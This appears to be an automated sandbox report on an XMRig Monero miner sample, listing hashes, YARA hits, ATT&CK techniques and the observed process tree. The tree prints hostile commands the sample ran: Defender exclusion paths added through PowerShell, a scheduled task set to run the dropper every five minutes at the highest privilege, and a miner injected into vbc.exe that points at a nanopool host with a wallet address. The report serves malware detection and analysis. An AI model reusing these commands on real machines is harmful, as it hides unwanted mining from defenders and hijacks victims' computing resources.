xmrig | 14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787

General

Target

14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe
Size

1.7MB
MD5

1ac75576f5e48d145f51a94a414ce8a1
SHA1

85aad9bb236e6a4b27ac8eb65b3d2554dbd10501
SHA256

14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787
SHA512

56e702f816b642efa2586a140226ebf319d3ccf8744b4e2eb8e5744fdc1e821d81ee28a254bb6d586bdc85faf8ac5a311128faef7bf6c6411a2aae64f8f6a30b
SSDEEP

49152:EZwe+yhWvrBATk7d+tVXMiV6kqXjlm9fb3j3K:2L+yhWvrBAAd+TXM31XpmFz3K

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/3812-321-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/3812-322-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/3812-323-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/3812-324-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/3812-330-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/3812-332-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

PWOJ.exe

pid process

3148 PWOJ.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

PWOJ.exe

description pid process target process

PID 3148 set thread context of 3812 3148 PWOJ.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1892 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5020 timeout.exe

pid	process
3148	PWOJ.exe

description	pid	process	target process
PID 3148 set thread context of 3812	3148	PWOJ.exe	vbc.exe

pid	process
1892	schtasks.exe

pid	process
5020	timeout.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exepowershell.exepowershell.exePWOJ.exepowershell.exepowershell.exe

pid	process
2656	14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe
2656	14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe
4924	powershell.exe
4916	powershell.exe
4924	powershell.exe
4916	powershell.exe
4916	powershell.exe
4924	powershell.exe
3148	PWOJ.exe
3148	PWOJ.exe
4076	powershell.exe
5092	powershell.exe
4076	powershell.exe
5092	powershell.exe
5092	powershell.exe
4076	powershell.exe
3148	PWOJ.exe
3148	PWOJ.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
652

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exepowershell.exepowershell.exePWOJ.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2656	14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeIncreaseQuotaPrivilege	4924	powershell.exe
Token: SeSecurityPrivilege	4924	powershell.exe
Token: SeTakeOwnershipPrivilege	4924	powershell.exe
Token: SeLoadDriverPrivilege	4924	powershell.exe
Token: SeSystemProfilePrivilege	4924	powershell.exe
Token: SeSystemtimePrivilege	4924	powershell.exe
Token: SeProfSingleProcessPrivilege	4924	powershell.exe
Token: SeIncBasePriorityPrivilege	4924	powershell.exe
Token: SeCreatePagefilePrivilege	4924	powershell.exe
Token: SeBackupPrivilege	4924	powershell.exe
Token: SeRestorePrivilege	4924	powershell.exe
Token: SeShutdownPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeSystemEnvironmentPrivilege	4924	powershell.exe
Token: SeRemoteShutdownPrivilege	4924	powershell.exe
Token: SeUndockPrivilege	4924	powershell.exe
Token: SeManageVolumePrivilege	4924	powershell.exe
Token: 33	4924	powershell.exe
Token: 34	4924	powershell.exe
Token: 35	4924	powershell.exe
Token: 36	4924	powershell.exe
Token: SeIncreaseQuotaPrivilege	4916	powershell.exe
Token: SeSecurityPrivilege	4916	powershell.exe
Token: SeTakeOwnershipPrivilege	4916	powershell.exe
Token: SeLoadDriverPrivilege	4916	powershell.exe
Token: SeSystemProfilePrivilege	4916	powershell.exe
Token: SeSystemtimePrivilege	4916	powershell.exe
Token: SeProfSingleProcessPrivilege	4916	powershell.exe
Token: SeIncBasePriorityPrivilege	4916	powershell.exe
Token: SeCreatePagefilePrivilege	4916	powershell.exe
Token: SeBackupPrivilege	4916	powershell.exe
Token: SeRestorePrivilege	4916	powershell.exe
Token: SeShutdownPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeSystemEnvironmentPrivilege	4916	powershell.exe
Token: SeRemoteShutdownPrivilege	4916	powershell.exe
Token: SeUndockPrivilege	4916	powershell.exe
Token: SeManageVolumePrivilege	4916	powershell.exe
Token: 33	4916	powershell.exe
Token: 34	4916	powershell.exe
Token: 35	4916	powershell.exe
Token: 36	4916	powershell.exe
Token: SeDebugPrivilege	3148	PWOJ.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeIncreaseQuotaPrivilege	5092	powershell.exe
Token: SeSecurityPrivilege	5092	powershell.exe
Token: SeTakeOwnershipPrivilege	5092	powershell.exe
Token: SeLoadDriverPrivilege	5092	powershell.exe
Token: SeSystemProfilePrivilege	5092	powershell.exe
Token: SeSystemtimePrivilege	5092	powershell.exe
Token: SeProfSingleProcessPrivilege	5092	powershell.exe
Token: SeIncBasePriorityPrivilege	5092	powershell.exe
Token: SeCreatePagefilePrivilege	5092	powershell.exe
Token: SeBackupPrivilege	5092	powershell.exe
Token: SeRestorePrivilege	5092	powershell.exe
Token: SeShutdownPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeSystemEnvironmentPrivilege	5092	powershell.exe
Token: SeRemoteShutdownPrivilege	5092	powershell.exe
Token: SeUndockPrivilege	5092	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

3812 vbc.exe

pid	process
3812	vbc.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.execmd.exePWOJ.execmd.exe

description	pid	process	target process
PID 2656 wrote to memory of 4916	2656	14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe	powershell.exe
PID 2656 wrote to memory of 4916	2656	14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe	powershell.exe
PID 2656 wrote to memory of 4924	2656	14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe	powershell.exe
PID 2656 wrote to memory of 4924	2656	14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe	powershell.exe
PID 2656 wrote to memory of 4084	2656	14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe	cmd.exe
PID 2656 wrote to memory of 4084	2656	14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe	cmd.exe
PID 4084 wrote to memory of 5020	4084	cmd.exe	timeout.exe
PID 4084 wrote to memory of 5020	4084	cmd.exe	timeout.exe
PID 4084 wrote to memory of 3148	4084	cmd.exe	PWOJ.exe
PID 4084 wrote to memory of 3148	4084	cmd.exe	PWOJ.exe
PID 3148 wrote to memory of 5092	3148	PWOJ.exe	powershell.exe
PID 3148 wrote to memory of 5092	3148	PWOJ.exe	powershell.exe
PID 3148 wrote to memory of 4076	3148	PWOJ.exe	powershell.exe
PID 3148 wrote to memory of 4076	3148	PWOJ.exe	powershell.exe
PID 3148 wrote to memory of 4456	3148	PWOJ.exe	cmd.exe
PID 3148 wrote to memory of 4456	3148	PWOJ.exe	cmd.exe
PID 4456 wrote to memory of 1892	4456	cmd.exe	schtasks.exe
PID 4456 wrote to memory of 1892	4456	cmd.exe	schtasks.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe
PID 3148 wrote to memory of 3812	3148	PWOJ.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe
"C:\Users\Admin\AppData\Local\Temp\14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9C83.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:4084

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:5020

C:\ProgramData\netcore\PWOJ.exe
"C:\ProgramData\netcore\PWOJ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
5⤵
- Creates scheduled task(s)
PID:1892

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of FindShellTrayWindow
PID:3812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\netcore\PWOJ.exe
Filesize
1.7MB

MD5
1ac75576f5e48d145f51a94a414ce8a1

SHA1
85aad9bb236e6a4b27ac8eb65b3d2554dbd10501

SHA256
14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787

SHA512
56e702f816b642efa2586a140226ebf319d3ccf8744b4e2eb8e5744fdc1e821d81ee28a254bb6d586bdc85faf8ac5a311128faef7bf6c6411a2aae64f8f6a30b

Download Submit
C:\ProgramData\netcore\PWOJ.exe
Filesize
1.7MB

MD5
1ac75576f5e48d145f51a94a414ce8a1

SHA1
85aad9bb236e6a4b27ac8eb65b3d2554dbd10501

SHA256
14f1b227518a5bc74cb3409c53080efed12e3a576585ce1f604fb0bfbfaa4787

SHA512
56e702f816b642efa2586a140226ebf319d3ccf8744b4e2eb8e5744fdc1e821d81ee28a254bb6d586bdc85faf8ac5a311128faef7bf6c6411a2aae64f8f6a30b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1071a652cfa0a19d955060191278d7d7

SHA1
de5af6abad2b62174473a5ec7f29e92b97c135b0

SHA256
116435168c23eb4d9a30524bd6b6b863e1e519fc224e82de8916d996c6cb3cef

SHA512
1f4c60f05a45f1d745984171fa7939c1353be3e6f043b7c8b2b70e9ba6bbae8a049d86cce7d2705c47c73957875e862361abc42375ce28e45d9236b233a5c6fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1071a652cfa0a19d955060191278d7d7

SHA1
de5af6abad2b62174473a5ec7f29e92b97c135b0

SHA256
116435168c23eb4d9a30524bd6b6b863e1e519fc224e82de8916d996c6cb3cef

SHA512
1f4c60f05a45f1d745984171fa7939c1353be3e6f043b7c8b2b70e9ba6bbae8a049d86cce7d2705c47c73957875e862361abc42375ce28e45d9236b233a5c6fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
de9737a6db8de54ecc175e45c4fec93f

SHA1
4b394074f55c9f209dab1125bab3e35cc4aaa1c7

SHA256
1dd44c86b2d5fc5519ac6f146c5662615291a201546d0c1b62b237636e87c159

SHA512
203e05750dbb7ab061640cf44ef4316d325b1801065067272530b8229e74fe354c206ec041c8c85b4cbb2e942fffe59d8d22428c8236f3374833fabe67229aa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9C83.tmp.bat
Filesize
140B

MD5
208aac91803204c4e64a468d78202984

SHA1
f9bf02d1bfeec4befc9e376c936ebc558fb2e5f3

SHA256
01be55af3c9e1142be295fd2cf68611402e951ba046f85b80ecb1fc93c889a63

SHA512
8183d6e3808cd673269dd97da9b40d21c1c1358a4480847c449b2e91726d1704d4b069d0f65bb85c10102330730eb4cd85cb77aee58ca8b9a2af64b45d2d8bde

Download Submit
memory/1892-252-0x0000000000000000-mapping.dmp

Download
memory/2656-132-0x0000000000CF0000-0x0000000000F90000-memory.dmp

Filesize
2.6MB

Download
memory/2656-138-0x0000000000CF0000-0x0000000000F90000-memory.dmp

Filesize
2.6MB

Download
memory/2656-129-0x00007FF802720000-0x00007FF80310C000-memory.dmp

Filesize
9.9MB

Download
memory/2656-133-0x00007FF810D10000-0x00007FF810E3C000-memory.dmp

Filesize
1.2MB

Download
memory/2656-130-0x0000000000CF0000-0x0000000000F90000-memory.dmp

Filesize
2.6MB

Download
memory/2656-122-0x00007FF811610000-0x00007FF8116AC000-memory.dmp

Filesize
624KB

Download
memory/2656-139-0x0000000001640000-0x0000000001683000-memory.dmp

Filesize
268KB

Download
memory/2656-131-0x0000000001640000-0x0000000001683000-memory.dmp

Filesize
268KB

Download
memory/2656-128-0x00007FF811450000-0x00007FF811547000-memory.dmp

Filesize
988KB

Download
memory/2656-127-0x00007FF819F90000-0x00007FF819FA1000-memory.dmp

Filesize
68KB

Download
memory/2656-126-0x00007FF81C170000-0x00007FF81C2BA000-memory.dmp

Filesize
1.3MB

Download
memory/2656-125-0x00007FF81BED0000-0x00007FF81BEF7000-memory.dmp

Filesize
156KB

Download
memory/2656-124-0x00007FF81B980000-0x00007FF81BA2E000-memory.dmp

Filesize
696KB

Download
memory/2656-123-0x00007FF81B0E0000-0x00007FF81B17D000-memory.dmp

Filesize
628KB

Download
memory/3148-310-0x00007FF8195A0000-0x00007FF8195D7000-memory.dmp

Filesize
220KB

Download
memory/3148-293-0x00007FF819E20000-0x00007FF819E45000-memory.dmp

Filesize
148KB

Download
memory/3148-333-0x0000000000CB0000-0x0000000000F50000-memory.dmp

Filesize
2.6MB

Download
memory/3148-328-0x0000000000BE0000-0x0000000000C23000-memory.dmp

Filesize
268KB

Download
memory/3148-224-0x00007FF811610000-0x00007FF8116AC000-memory.dmp

Filesize
624KB

Download
memory/3148-225-0x00007FF81B0E0000-0x00007FF81B17D000-memory.dmp

Filesize
628KB

Download
memory/3148-226-0x00007FF81B980000-0x00007FF81BA2E000-memory.dmp

Filesize
696KB

Download
memory/3148-227-0x00007FF81BED0000-0x00007FF81BEF7000-memory.dmp

Filesize
156KB

Download
memory/3148-228-0x00007FF81C170000-0x00007FF81C2BA000-memory.dmp

Filesize
1.3MB

Download
memory/3148-229-0x00007FF819F90000-0x00007FF819FA1000-memory.dmp

Filesize
68KB

Download
memory/3148-231-0x0000000000CB0000-0x0000000000F50000-memory.dmp

Filesize
2.6MB

Download
memory/3148-230-0x00007FF811450000-0x00007FF811547000-memory.dmp

Filesize
988KB

Download
memory/3148-233-0x0000000000BE0000-0x0000000000C23000-memory.dmp

Filesize
268KB

Download
memory/3148-232-0x00007FF802720000-0x00007FF80310C000-memory.dmp

Filesize
9.9MB

Download
memory/3148-234-0x0000000000CB0000-0x0000000000F50000-memory.dmp

Filesize
2.6MB

Download
memory/3148-235-0x00007FF810D10000-0x00007FF810E3C000-memory.dmp

Filesize
1.2MB

Download
memory/3148-326-0x0000000000CB0000-0x0000000000F50000-memory.dmp

Filesize
2.6MB

Download
memory/3148-301-0x00007FF81C070000-0x00007FF81C0DC000-memory.dmp

Filesize
432KB

Download
memory/3148-298-0x00007FFFFC230000-0x00007FFFFC2FC000-memory.dmp

Filesize
816KB

Download
memory/3148-296-0x00007FF811210000-0x00007FF811235000-memory.dmp

Filesize
148KB

Download
memory/3148-219-0x0000000000000000-mapping.dmp

Download
memory/3812-332-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3812-330-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3812-325-0x00000283C41D0000-0x00000283C41F0000-memory.dmp

Filesize
128KB

Download
memory/3812-337-0x00000283C5C50000-0x00000283C5C70000-memory.dmp

Filesize
128KB

Download
memory/3812-336-0x00000283C5C30000-0x00000283C5C50000-memory.dmp

Filesize
128KB

Download
memory/3812-321-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3812-322-0x0000000140343234-mapping.dmp

Download
memory/3812-323-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3812-324-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3812-335-0x00000283C5C50000-0x00000283C5C70000-memory.dmp

Filesize
128KB

Download
memory/3812-334-0x00000283C5C30000-0x00000283C5C50000-memory.dmp

Filesize
128KB

Download
memory/3812-331-0x00000283C5BF0000-0x00000283C5C30000-memory.dmp

Filesize
256KB

Download
memory/4076-237-0x0000000000000000-mapping.dmp

Download
memory/4084-136-0x0000000000000000-mapping.dmp

Download
memory/4456-243-0x0000000000000000-mapping.dmp

Download
memory/4916-134-0x0000000000000000-mapping.dmp

Download
memory/4924-160-0x00000297391D0000-0x0000029739246000-memory.dmp

Filesize
472KB

Download
memory/4924-150-0x0000029739020000-0x0000029739042000-memory.dmp

Filesize
136KB

Download
memory/4924-135-0x0000000000000000-mapping.dmp

Download
memory/5020-158-0x0000000000000000-mapping.dmp

Download
memory/5092-236-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads